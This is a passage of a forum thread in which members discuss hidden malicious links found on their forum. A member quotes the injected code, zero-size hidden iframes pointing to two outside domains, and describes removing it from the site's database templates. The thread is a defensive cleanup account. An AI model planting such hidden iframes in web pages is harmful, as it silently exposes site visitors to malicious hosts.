Page 2 of 2 FirstFirst 12
Results 16 to 20 of 20

Thread: What is best-videogames.com?

  1. #16
    Administrator Mr. Widget's Avatar
    Join Date
    Apr 2003
    Location
    San Francisco
    Posts
    9,719
    Thanks Ann. You're the best!


    Widget

  2. #17
    Webmaster Don McRitchie's Avatar
    Join Date
    Apr 2003
    Location
    Winnipeg, Canada
    Posts
    1,753
    Quote Originally Posted by cantelow View Post
    That was an interesting problem. Thanks, everyone for the info.

    I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:

    Code:
      <div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>
    
      <div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>
    to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

    I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

    Happily, clearing the malicious links in just these 2 template records clears them out of the whole site.

    Ann
    I'll try and get the forum software updated to the latest version within the next 48 hrs as I suspect that is where the exploit originated to allow access to modify the templates in the mysql database.
    Regards

    Don McRitchie

  3. #18
    Senior Member Altec Best's Avatar
    Join Date
    May 2008
    Location
    Central New Jersey
    Posts
    378
    Quote Originally Posted by cantelow View Post
    That was an interesting problem. Thanks, everyone for the info.

    I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:

    Code:
      <div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>
     
      <div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>
    to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

    I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

    Happily, clearing the malicious links in just these 2 template records clears them out of the whole site.

    Ann
    I too would like to Thank You Ann, for fixing it quickly.It's reassuring to know you good Folk's are on the ball !

    Quote Originally Posted by Earl K View Post

    This site loads cleanly now .
    Yes it does.Thank You too Earl for the Info & Links !

    Much Appreciated !
    "James B. Lansing" = Lansing Manufacturing ~ Altec Lansing ~ JBL

  4. #19
    Senior Member
    Join Date
    Feb 2004
    Location
    Central Coast California
    Posts
    9,042
    Thanks, Ann.
    Out.

  5. #20
    Senior Member JuniorJBL's Avatar
    Join Date
    Feb 2004
    Location
    Utah
    Posts
    1,723
    Thanks to our Host's here in the rockies!!
    Always fun learning more.......

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •